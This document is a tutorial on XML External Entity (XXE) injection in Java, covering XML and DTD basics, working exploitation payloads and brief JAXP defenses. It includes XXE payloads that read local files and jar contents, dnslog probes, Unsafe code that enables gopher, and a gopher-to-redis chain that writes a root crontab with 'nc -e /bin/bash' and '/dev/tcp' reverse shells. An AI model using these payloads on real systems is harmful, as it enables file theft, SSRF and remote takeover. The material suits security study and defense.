XXE: principles, exploitation, and remediation

Foreword:

        XXE stands for XML External Entity injection. XML is widely used in web applications, in functions such as authentication, file transfer, and image upload.

        XML (Extensible Markup Language) is a markup language for transmitting and storing data. XXE abuses XML external entities: it allows an attacker to read files on the application server's file system, and to make the server send requests on the attacker's behalf and so reach internal interfaces that are not accessible from outside, similar to SSRF.

Vulnerability principle:

XML structure:

        To understand the cause of the XXE vulnerability, we first need to understand the structure of XML:

XML declaration:

        <?xml version="1.0" encoding="UTF-8" standalone="yes"?>

        This line is the XML declaration. It has the same syntax as a processing instruction: it begins with <? and ends with ?>, and the first word after <? is the name, here xml.
        version, encoding, and standalone are its three pseudo-attributes. Each is a name-value pair joined by an equals sign, with the name on the left and the quoted value on the right. When present, they must appear in this order:

  • version: the XML version the document conforms to, here 1.0
  • encoding: the character encoding of the document
  • standalone: whether the document depends on external markup declarations; yes means it does not rely on an external DTD, while no (the default) means external declarations may affect its content

XML root element definition:

        The tree structure of an XML document requires exactly one root element. Its start tag comes before the start tags of all other elements, and its end tag comes after the end tags of all other elements, for example:

<?xml version="1.0" encoding="GB2312" standalone="no"?>
<users>
   <name>Zhang San</name>
</users>
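
        The declaration fields and the root element can be inspected after parsing. The following is a minimal sketch, assuming the JDK's built-in DOM parser; the class name XmlDeclDemo and the helper describe are hypothetical names used only for illustration.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

class XmlDeclDemo {
    // Parses the XML text and reports what the declaration and the root element say.
    static String describe(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return "version=" + doc.getXmlVersion()
                + " encoding=" + doc.getXmlEncoding()
                + " standalone=" + doc.getXmlStandalone()
                + " root=" + doc.getDocumentElement().getTagName();
    }

    public static void main(String[] args) throws Exception {
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
                + "<users><name>Zhang San</name></users>";
        System.out.println(describe(xml));
    }
}
```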

XML element:

        The basic structure of an element consists of a start tag, data content, and an end tag, such as

<?xml version="1.0" encoding="GB2312" standalone="no"?>
<Person>
    <Name>Zhang San</Name>
    <Sex>Male</Sex>
</Person>

Note that:

  • Element tags are case sensitive: <Name> and <name> are two different tags
  • Closing tags must contain a forward slash, as in </Name>

XML element names follow these rules:

  • A name can contain letters, digits, and other characters such as hyphens, underscores, and periods
  • A name cannot start with a digit, hyphen, or period (an underscore is allowed as the first character)
  • Names beginning with xml (in any letter case) are reserved
  • A name cannot contain spaces; colons are reserved for namespace prefixes and should be avoided otherwise
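
        A quick way to check a candidate element name is to ask a DOM implementation to create an element with it. The sketch below assumes the JDK's built-in DOM implementation, which rejects syntactically invalid names with a DOMException; XmlNameCheck and isAcceptedName are hypothetical names. It only checks syntax and does not enforce the reservation of names starting with xml.

```java
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.DOMException;
import org.w3c.dom.Document;

class XmlNameCheck {
    // Returns true if the DOM implementation accepts the string as an element name.
    static boolean isAcceptedName(String name) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .newDocument();
        try {
            doc.createElement(name);
            return true;
        } catch (DOMException e) {
            return false; // the name contains a character that is not allowed there
        }
    }

    public static void main(String[] args) throws Exception {
        String[] candidates = {"Name", "_name", "1name", "my name", "-name"};
        for (String c : candidates) {
            System.out.println("\"" + c + "\" accepted: " + isAcceptedName(c));
        }
    }
}
```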

PI (Processing Instruction):

        A processing instruction (PI) starts with "<?" and ends with "?>". It passes information to the application that processes the document rather than describing the document's data.

<?xml-stylesheet href="core.css" type="text/css"?>

        This example tells the processing application to use core.css to style the document.
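
        An application can read processing instructions from the parsed tree. The sketch below, assuming the JDK's built-in DOM parser, returns the target and data of the first top-level PI; PiDemo and firstPi are hypothetical names.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.w3c.dom.ProcessingInstruction;
import org.xml.sax.InputSource;

class PiDemo {
    // Returns "target | data" for the first top-level processing instruction, or null.
    static String firstPi(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
        NodeList top = doc.getChildNodes();
        for (int i = 0; i < top.getLength(); i++) {
            Node n = top.item(i);
            if (n.getNodeType() == Node.PROCESSING_INSTRUCTION_NODE) {
                ProcessingInstruction pi = (ProcessingInstruction) n;
                return pi.getTarget() + " | " + pi.getData();
            }
        }
        return null;
    }

    public static void main(String[] args) throws Exception {
        String xml = "<?xml-stylesheet href=\"core.css\" type=\"text/css\"?><doc/>";
        System.out.println(firstPi(xml));
    }
}
```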

PCDATA:

        #PCDATA specifies that an element contains parsed character data.
        The following example illustrates its use: movies.xml stores the movie data, and movies.dtd validates movies.xml.

Example file (movies.dtd):

<?xml version="1.0" encoding="GB2312"?>
<!ELEMENT movies (id, name, brief, time)>
<!ATTLIST movies type CDATA #REQUIRED>
<!ELEMENT id (#PCDATA)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT brief (#PCDATA)>
<!ELEMENT time (#PCDATA)>

id, name, brief, time can only contain non-markup text (cannot have their own child elements).

The XML file looks like this (movies.xml):

<?xml version="1.0" encoding="GB2312"?>
<!DOCTYPE movies SYSTEM "movies.dtd">
<movies type="movies">
    <id>1</id>
    <name>Deadly Cradle</name>
    <brief>Jet Li's latest masterpiece</brief>
    <time>2003</time>
</movies>
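
        The effect of the (#PCDATA) declarations can be checked with a validating parser. The sketch below is an illustration under stated assumptions: it embeds the DTD as an internal subset instead of loading movies.dtd from disk, uses the JDK's built-in parser, and collects validation errors through an ErrorHandler. DtdValidationDemo and validate are hypothetical names.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.ErrorHandler;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

class DtdValidationDemo {
    // Same declarations as movies.dtd, embedded as an internal subset (an assumption
    // made so that the sketch needs no files).
    static final String DTD =
            "<!DOCTYPE movies [\n"
          + "  <!ELEMENT movies (id, name, brief, time)>\n"
          + "  <!ATTLIST movies type CDATA #REQUIRED>\n"
          + "  <!ELEMENT id (#PCDATA)>\n"
          + "  <!ELEMENT name (#PCDATA)>\n"
          + "  <!ELEMENT brief (#PCDATA)>\n"
          + "  <!ELEMENT time (#PCDATA)>\n"
          + "]>\n";

    // Validates the given document body against the DTD and returns the error messages.
    static List<String> validate(String body) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setValidating(true); // turn on DTD validation
        DocumentBuilder builder = factory.newDocumentBuilder();
        final List<String> errors = new ArrayList<>();
        builder.setErrorHandler(new ErrorHandler() {
            public void warning(SAXParseException e) { }
            public void error(SAXParseException e) { errors.add(e.getMessage()); }
            public void fatalError(SAXParseException e) throws SAXParseException { throw e; }
        });
        builder.parse(new InputSource(new StringReader(DTD + body)));
        return errors;
    }

    public static void main(String[] args) throws Exception {
        String valid = "<movies type=\"movies\"><id>1</id><name>Deadly Cradle</name>"
                + "<brief>Jet Li's latest masterpiece</brief><time>2003</time></movies>";
        // <id> holds a child element here, which (#PCDATA) does not allow
        String invalid = valid.replace("<id>1</id>", "<id><b>1</b></id>");
        System.out.println("valid document errors:   " + validate(valid));
        System.out.println("invalid document errors: " + validate(invalid));
    }
}
```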

CDATA:

        CDATA is used when an entire block of text should be treated as plain character data rather than markup. It is useful when the text contains many "<", ">", "&", or quotation mark characters that are not meant as tags.

<Example>
    <![CDATA[
      <Person>
          <Name>ZhangSan</Name>
          <Sex>Male</Sex>
      </Person>
    ]]>
</Example>
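
        To see that the parser treats the CDATA content as text, one can compare the text content with the number of elements in the tree. This is a minimal sketch assuming the JDK's built-in DOM parser; CdataDemo, textOf, and elementCount are hypothetical names.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class CdataDemo {
    static Document parse(String xml) throws Exception {
        return DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
    }

    // Text content of the root element; CDATA sections contribute their raw characters.
    static String textOf(String xml) throws Exception {
        return parse(xml).getDocumentElement().getTextContent();
    }

    // Number of elements in the whole document.
    static int elementCount(String xml) throws Exception {
        return parse(xml).getElementsByTagName("*").getLength();
    }

    public static void main(String[] args) throws Exception {
        String xml = "<Example><![CDATA[<Person><Name>ZhangSan</Name></Person>]]></Example>";
        System.out.println("text:     " + textOf(xml));
        System.out.println("elements: " + elementCount(xml));
    }
}
```

        The tags inside the CDATA section appear in the text and are not counted as elements.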

Entities:

        An entity is a storage unit in XML; it can be a string, a file, a database record, and so on. Entities are mainly used to avoid repeating content in a document: we define a name for some content and then reference that name wherever the content is needed. When the parser processes the document, each entity reference is replaced with the corresponding content.

<!DOCTYPE example [
    <!ENTITY intro "Here is some comment for entity of XML">
]>
<example>
    <hello>&intro;</hello>
</example>
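
        The replacement of an entity reference can be observed directly. The sketch below, assuming the JDK's built-in DOM parser with default settings, parses the document above and returns the text of the hello element; EntityDemo and helloText are hypothetical names.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class EntityDemo {
    static final String XML =
            "<!DOCTYPE example [\n"
          + "    <!ENTITY intro \"Here is some comment for entity of XML\">\n"
          + "]>\n"
          + "<example>\n"
          + "    <hello>&intro;</hello>\n"
          + "</example>";

    // Returns the text of <hello> after the parser has expanded &intro;.
    static String helloText() throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(XML)));
        return doc.getElementsByTagName("hello").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(helloText());
    }
}
```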

DOCTYPE:

        A DTD declaration always starts with <!DOCTYPE, followed by whitespace and the name of the document's root element. This is the key location for the XXE vulnerability, so the DTD is explained in detail here. DTDs are divided into:

  • Internal DTD
  • External DTD:
    • Private DTD: Use SYSTEM, followed by the URL of the external DTD.
    • Public DTD: Use PUBLIC, followed by the DTD public name, followed by the DTD's URL.

Internal DTD:

        First look at the format of the internal DTD:

<!DOCTYPE root element name[<!ELEMENT element name (element type definition)>]>

        For example, the following XML document uses an internal DTD to define its types, so that the parser can check whether the structure and data types are valid:

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!DOCTYPE poem [
    <!ELEMENT poem (title,author,line+)>
    <!ELEMENT title (#PCDATA)>
    <!ELEMENT author (#PCDATA)>
    <!ELEMENT line (#PCDATA)>
]>
<poem>
    <title>静夜思</title>
    <author>李白</author>
    <line>床前明月光,</line>
    <line>疑是地上霜.</line>
    <line>举头望明月,</line>
    <line>低头思故乡.</line>
</poem>

Private DTD of external DTD:

        Placing the DTD inside the XML document has two drawbacks. First, the document becomes larger, and some programs may not need the DTD information at all. Second, it makes sharing difficult, since several XML documents may want to use the same DTD. This is why external DTDs exist. A private DTD is declared like this:

<!DOCTYPE root element name SYSTEM "URI of external DTD file">
<!DOCTYPE poem SYSTEM "http://test.com/poem.dtd">
<poem>
 <title>静夜思</title>
 <author>李白</author>
 <line>床前明月光,</line>
 <line>疑是地上霜.</line>
 <line>举头望明月,</line>
 <line>低头思故乡.</line>
 <commet>李白是中国最伟大的诗人!</commet>
</poem>

The content of http://test.com/poem.dtd is as follows:
<?xml version="1.0" encoding="UTF-8"?>
<!ELEMENT poem (title,author,line+,commet)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT author (#PCDATA)>
<!ELEMENT line (#PCDATA)>
<!ELEMENT commet  (#PCDATA)>

        With this declaration, the server fetches the DTD from the specified URL and parses it. Note that if we control this URL, we can make the server send a request to any server we choose. The XXE vulnerability exists precisely because this external access is allowed; this is explained in detail later.

Public DTD of external DTD:

       The public DTD is defined as follows, mainly using the keywords DOCTYPE, PUBLIC.

<!DOCTYPE root element name PUBLIC "DTD name" "URI of external DTD file">
<!DOCTYPE poem PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.2//EN" 
"http://www.test.org/poem.dtd">
<poem>
<title>静夜思</title>
<author>李白</author>
<line>床前明月光,</line>
<line>疑是地上霜.</line>
<line>举头望明月,</line>
<line>低头思故乡.</line>
<commet>李白是中国最伟大的诗人!</commet>
</poem>

        "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.2//EN" is the name of the public DTD, and the naming follows a convention. It starts with "-", which indicates that the DTD was not issued by a standards organization. After the double slash "//" comes the name of the DTD owner, here Sun Microsystems. After another "//" comes a description of the document type, which shows that this DTD describes the format of the JSP tag library version 1.2. The final "//" is followed by an ISO 639 language identifier.
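
        Both external forms make the parser ask for the identifier given in the DOCTYPE. The sketch below makes this visible without any network traffic: it installs an EntityResolver that records the public and system identifiers the parser requests and answers with an empty DTD. It assumes the JDK's built-in parser, which loads the external DTD by default even when not validating; ExternalDtdProbe and requestedIds are hypothetical names.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

class ExternalDtdProbe {
    // Parses the XML and returns every "publicId -> systemId" pair the parser tried to resolve.
    static List<String> requestedIds(String xml) throws Exception {
        final List<String> seen = new ArrayList<>();
        DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
        builder.setEntityResolver((publicId, systemId) -> {
            seen.add(publicId + " -> " + systemId);
            // Answer with an empty DTD so that no real request is sent
            return new InputSource(new StringReader(""));
        });
        builder.parse(new InputSource(new StringReader(xml)));
        return seen;
    }

    public static void main(String[] args) throws Exception {
        String system = "<!DOCTYPE poem SYSTEM \"http://test.com/poem.dtd\"><poem/>";
        String pub = "<!DOCTYPE poem PUBLIC \"-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.2//EN\" "
                + "\"http://www.test.org/poem.dtd\"><poem/>";
        System.out.println(requestedIds(system));
        System.out.println(requestedIds(pub));
    }
}
```

        Without the resolver, the same lookups would go out as real requests to the given URLs, which is the behavior XXE relies on.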

XXE vulnerability:

        With this background, we can see that XXE is rooted in the parser's handling of externally defined DTDs and entities, which leads to a series of security issues. Let's write some simple code to verify this:

Server-side Java code:

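import java.io.File;
import java.io.InputStream;
import java.nio.file.Files;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

public class Main {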
    public static void main(String[] args) {

        // XmlReader is static, so no Main instance is needed
        XmlReader();
    }
    public static void XmlReader() {
        DocumentBuilderFactory domfac = DocumentBuilderFactory.newInstance();
        try {
            DocumentBuilder domBuilder = domfac.newDocumentBuilder();
            InputStream is = Files.newInputStream(new File("D:\\code\\xxetest\\xxe\\src\\main\\java\\org\\example\\test.xml").toPath());
            Document doc = domBuilder.parse(is);
            Element root = doc.getDocumentElement();
            NodeList users = root.getChildNodes();
            for (int i = 0; i < users.getLength(); i++) {
                Node user = users.item(i);
                if (user.getNodeType() == Node.ELEMENT_NODE) {
                    for (Node node = user.getFirstChild(); node != null; node = node
                            .getNextSibling()) {
                        if (node.getNodeType() == Node.ELEMENT_NODE) {
                            if (node.getNodeName().equals("name")) {
                                String name = node.getNodeValue();
                                String name1 = node.getFirstChild()
                                        .getNodeValue();
                                System.out.println("name==" + name);
                                System.out.println("name1==" + name1);
                            }
                            if (node.getNodeName().equals("price")) {
                                String price = node.getFirstChild()
                                        .getNodeValue();
                                System.out.println(price);
                            }
                        }
                    }
                }
            }
            NodeList node = root.getElementsByTagName("string");
            for (int i = 0; i < node.getLength(); i++) {
                Node str = node.item(i);
                String s = str.getFirstChild().getNodeValue();
                System.out.println(s);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }

    }

}

Here is the normal XML code:

<?xml version="1.0" encoding="GB2312" standalone="no"?>
<users>
    <user email="www.baidu.com">
        <name>张三</name>
        <age>18</age>
        <sex>男</sex>
    </user>
    <user>
        <name>李四</name>
        <age>16</age>
        <sex>女</sex>
    </user>
    <user>
        <name>王五</name>
        <age>25</age>
        <sex>不明</sex>
    </user>
</users>

After running, the document is parsed normally.

But if we change the XML content to:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poem SYSTEM "http://dxzxw3.dnslog.cn">
<poem></poem>

         When the server parses this XML, it should send a request to dxzxw3.dnslog.cn. Running it confirms this: the dnslog platform records the access.

         Next, let's reference an external DTD with the PUBLIC form to see whether it also works:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poem PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.2//EN" 
"http://0zbc0e.dnslog.cn">
<poem></poem>

        After execution, the dnslog platform again records the access.

        From this we know that, to test whether a server is vulnerable to XXE, it is enough to reference an external DTD with either the SYSTEM or the PUBLIC keyword and watch the dnslog platform for a request. The Content-Type header of the request should identify the body as XML:

Content-Type: text/xml
Content-Type: application/xml

XXE Advanced:

        The above shows how to quickly detect whether a website has an XXE vulnerability, and it works even when the website does not echo anything back. When the website does echo parsed content, how can we combine XXE with other protocols for further attacks, for example to read system files? Does the following work?

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">
<users>
    <user>
        <name>李四</name>
        <age>16</age>
        <sex>女</sex>
    </user>
</users>

          This does not work. First, nothing outputs the content that was read. Second, the file is not a valid DTD, so parsing fails with an error.

      To read the file we need an ENTITY, so that the file content is substituted into an element that the application outputs:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users [
        <!ENTITY test SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">
        ]>
<users>
    <user>
        <name>&test;</name>
        <age>16</age>
        <sex>女</sex>
    </user>
</users>

         After execution, the file content has been read and is output in place of &test;.
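
         The same behavior can be reproduced safely on a local machine. The sketch below is an illustration under stated assumptions: instead of the hosts file it points the entity at a temporary file that it creates itself, and it uses the JDK's built-in parser with default, unhardened settings. LocalXxeDemo, readViaEntity, and demo are hypothetical names.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class LocalXxeDemo {
    // Builds a document whose external entity points at the given file and returns
    // the text that ends up inside <name> after parsing.
    static String readViaEntity(Path target) throws Exception {
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                + "<!DOCTYPE users [ <!ENTITY test SYSTEM \"" + target.toUri() + "\"> ]>\n"
                + "<users><user><name>&test;</name></user></users>";
        Document doc = DocumentBuilderFactory.newInstance() // default settings, not hardened
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
        return doc.getElementsByTagName("name").item(0).getTextContent();
    }

    // Creates a harmless temporary file and reads it back through the entity.
    static String demo() throws Exception {
        Path tmp = Files.createTempFile("xxe-demo", ".txt");
        try {
            Files.write(tmp, "harmless placeholder".getBytes(StandardCharsets.UTF_8));
            return readViaEntity(tmp);
        } finally {
            Files.deleteIfExists(tmp);
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("name = " + demo());
    }
}
```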

         In testing, the PUBLIC form works as well:

<!DOCTYPE users [
        <!ENTITY test PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.2//EN"
                "file:///c:/windows/system32/drivers/etc/hosts">
        ]>

        In other words, any protocol the parser supports can be used.

        Only Java is tested here; PHP and other languages are not covered. In Java the request is ultimately made through java.net.URL. In JDK 1.8 this class supports only 7 protocols, while JDK 1.7 supports 8:

JDK 1.8 supports: file, ftp, http, https, jar, mailto, netdoc
JDK 1.7 supports: file, ftp, http, https, jar, mailto, netdoc, gopher

        Although JDK 1.7 supports gopher, the developer has to enable it explicitly, which makes it of limited practical use.
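
        Which schemes a given runtime accepts can be checked rather than assumed. The sketch below relies on the fact that the java.net.URL constructor throws MalformedURLException when no handler exists for a scheme; the sample URLs are placeholders and no connection is opened. SchemeCheck and supports are hypothetical names, and the result depends on the JDK version in use.

```java
import java.net.MalformedURLException;
import java.net.URL;

class SchemeCheck {
    // Returns true if this JDK has a protocol handler for the URL's scheme.
    // Constructing a URL object does not open a connection.
    @SuppressWarnings("deprecation") // the URL constructor is deprecated on recent JDKs
    static boolean supports(String sampleUrl) {
        try {
            new URL(sampleUrl);
            return true;
        } catch (MalformedURLException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        String[] samples = {
            "file:///tmp/x",
            "ftp://example.com/",
            "http://example.com/",
            "https://example.com/",
            "jar:file:///tmp/x.jar!/",
            "mailto:user@example.com",
            "netdoc:///tmp/x",
            "gopher://example.com/"
        };
        for (String s : samples) {
            System.out.println(s + " -> " + supports(s));
        }
    }
}
```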

Exploiting the jar protocol:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users [
        <!ENTITY test SYSTEM "jar:file:///D:/test/drools-compiler.jar!/META-INF/MANIFEST.MF">
        ]>
<users>
    <user>
        <name>&test;</name>
        <age>16</age>
        <sex>女</sex>
    </user>
</users>

        Note that if the entry being read is a class file, parsing throws an exception, because the class file contains characters that are not legal in XML or is too large.
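
        The jar: URL syntax, with the archive location before "!/" and the entry path after it, can be tried outside the parser. The sketch below creates a temporary jar that contains only a manifest and reads that entry through java.net.URL; the temporary file stands in for drools-compiler.jar, and JarUrlDemo and readManifestViaJarUrl are hypothetical names.

```java
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.jar.Attributes;
import java.util.jar.JarOutputStream;
import java.util.jar.Manifest;

class JarUrlDemo {
    // Creates a jar holding only a manifest, then reads the manifest back via a jar: URL.
    @SuppressWarnings("deprecation") // the URL constructor is deprecated on recent JDKs
    static String readManifestViaJarUrl() throws Exception {
        Path jar = Files.createTempFile("xxe-jar-demo", ".jar");
        jar.toFile().deleteOnExit();

        Manifest manifest = new Manifest();
        manifest.getMainAttributes().put(Attributes.Name.MANIFEST_VERSION, "1.0");
        try (OutputStream out = Files.newOutputStream(jar);
             JarOutputStream jos = new JarOutputStream(out, manifest)) {
            // no further entries; the constructor already writes META-INF/MANIFEST.MF
        }

        // jar:<URL of the archive>!/<path of the entry inside the archive>
        URL url = new URL("jar:" + jar.toUri() + "!/META-INF/MANIFEST.MF");
        try (InputStream in = url.openStream()) {
            ByteArrayOutputStream buf = new ByteArrayOutputStream();
            byte[] chunk = new byte[4096];
            int n;
            while ((n = in.read(chunk)) != -1) {
                buf.write(chunk, 0, n);
            }
            return new String(buf.toByteArray(), StandardCharsets.UTF_8);
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(readManifestViaJarUrl());
    }
}
```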

If an FTP service on the intranet allows unauthenticated access, the ftp protocol can be used to list a directory:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users [
        <!ENTITY test SYSTEM "ftp://127.0.0.1:21">
        ]>
<users>
    <user>
        <name>&test;</name>
    </user>
</users>

gopher protocol:

        Although the JDK has to be configured manually before gopher can be used, it is tested here for the sake of research. In SSRF attacks the gopher protocol is typically used against services such as redis, mysql, fastcgi, and smtp. Here we run a simple test against redis:

        gopher://ip:port/_TCP/IP data stream

Note:

  • In the gopher data stream, carriage return and line feed are URL-encoded as %0d%0a
  • %0d%0a at the end of the data stream marks the end of the message
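
        The encoding rule can be sketched as a small helper that percent-encodes a raw TCP payload and appends it after the "_" filler character. This is an illustration only, using a harmless redis PING as the payload; it is not how Gopherus is implemented, and GopherUrlEncoder and toGopherUrl are hypothetical names.

```java
import java.nio.charset.StandardCharsets;

class GopherUrlEncoder {
    // Builds gopher://host:port/_<payload>, percent-encoding every byte that is not
    // a letter, a digit, or one of - . _ ~ /
    static String toGopherUrl(String host, int port, String rawPayload) {
        StringBuilder sb = new StringBuilder("gopher://")
                .append(host).append(':').append(port).append("/_");
        for (byte b : rawPayload.getBytes(StandardCharsets.UTF_8)) {
            int c = b & 0xFF;
            boolean keep = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9')
                    || c == '-' || c == '.' || c == '_' || c == '~' || c == '/';
            if (keep) {
                sb.append((char) c);
            } else {
                sb.append(String.format("%%%02X", c)); // CR LF becomes %0D%0A
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // A redis PING in the redis wire format; every line ends with CR LF
        String ping = "*1\r\n$4\r\nPING\r\n";
        System.out.println(toGopherUrl("127.0.0.1", 6379, ping));
        // prints gopher://127.0.0.1:6379/_%2A1%0D%0A%244%0D%0APING%0D%0A
    }
}
```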

The java.net.URL source shows that it checks whether the protocol is gopher and, if so, whether enableGopher is true.

 The default value of enableGopher is false, so here it is changed to true.

        Because the field is declared private static final, plain reflection cannot change it, so the following code modifies it through Unsafe:

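import java.io.File;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import sun.misc.Unsafe;

public class Main {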

    private static Unsafe unsafe;

    static{
        try{
            final Field unsafeField = Unsafe.class.getDeclaredField("theUnsafe");
            unsafeField.setAccessible(true);
            unsafe = (Unsafe) unsafeField.get(null);
        }catch(Exception ex){
            ex.printStackTrace();
        }
    }

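    // Overwrites a static final boolean field through Unsafe
    public static void setFinalStatic(Field field, boolean value) {
        try {
            Object fieldBase = unsafe.staticFieldBase(field);
            long fieldOffset = unsafe.staticFieldOffset(field);
            // enableGopher is a primitive boolean, so write it with putBoolean
            // rather than storing an object reference with putObject
            unsafe.putBoolean(fieldBase, fieldOffset, value);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }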

    public static void main(String[] args) throws Exception {

        // XmlReader is static, so no Main instance is needed
        XmlReader();
    }

    public static void XmlReader() throws Exception {
        //URL url = new URL("gopher://192.168.4.243:6379");


        String class_name = "java.net.URL";
        Class urlclass = Class.forName(class_name);

        Field field = urlclass.getDeclaredField("enableGopher");

        field.setAccessible(true);
        boolean back = (boolean) field.get(urlclass);

        Main.setFinalStatic(field, true);

        DocumentBuilderFactory domfac = DocumentBuilderFactory.newInstance();
        try {
            DocumentBuilder domBuilder = domfac.newDocumentBuilder();
            InputStream is = Files.newInputStream(new File("D:\\code\\xxetest\\xxe\\src\\main\\java\\org\\example\\test.xml").toPath());

            Document doc = domBuilder.parse(is);
            Element root = doc.getDocumentElement();
            NodeList users = root.getChildNodes();
            for (int i = 0; i < users.getLength(); i++) {
                Node user = users.item(i);
                if (user.getNodeType() == Node.ELEMENT_NODE) {
                    for (Node node = user.getFirstChild(); node != null; node = node
                            .getNextSibling()) {
                        if (node.getNodeType() == Node.ELEMENT_NODE) {
                            if (node.getNodeName().equals("name")) {
                                String name = node.getNodeValue();
                                String name1 = node.getFirstChild()
                                        .getNodeValue();
                                System.out.println("name==" + name);
                                System.out.println("name1==" + name1);
                            }
                            if (node.getNodeName().equals("price")) {
                                String price = node.getFirstChild()
                                        .getNodeValue();
                                System.out.println(price);
                            }
                        }
                    }
                }
            }
            NodeList node = root.getElementsByTagName("string");
            for (int i = 0; i < node.getLength(); i++) {
                Node str = node.item(i);
                String s = str.getFirstChild().getNodeValue();
                System.out.println(s);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }

    }
}

Generate the payload with Gopherus and put it into the XML:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users [
        <!ENTITY test SYSTEM "gopher://192.168.4.243:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2451%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20nc%20-e%20/bin/bash%20192.168.4.243%201234%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2424%0D%0A/var/spool/cron/crontabs%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A">
        ]>
<users>
    <user>
        <name>&test;</name>
        <age>16</age>
        <sex>女</sex>
    </user>
</users>

       The scheduled task would normally be added with the following redis commands:

set xx "\n* * * * * bash -i >& /dev/tcp/192.168.4.243/1234 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

On CentOS, the scheduled task files are in /var/spool/cron/<username>
On Ubuntu, the scheduled task files are in /var/spool/cron/crontabs/<username>

        After running, a new root file is created under /var/spool/cron/crontabs, and the reverse shell connects back successfully.

XXE defense:

         Defending against XXE is straightforward: prevent the parser from loading external DTDs and external entities.

         JAXP currently provides three properties for restricting external access:

javax.xml.XMLConstants.ACCESS_EXTERNAL_DTD: A list of protocols by which external DTDs and external entity references may be accessed.

javax.xml.XMLConstants.ACCESS_EXTERNAL_SCHEMA: A list of protocols via which external schema references, specified by the schemaLocation attribute of import and include elements, may be resolved.

javax.xml.XMLConstants.ACCESS_EXTERNAL_STYLESHEET: A list of protocols via which external references specified in stylesheet constructs such as processing instructions, document() functions, import elements, and include elements may be resolved.

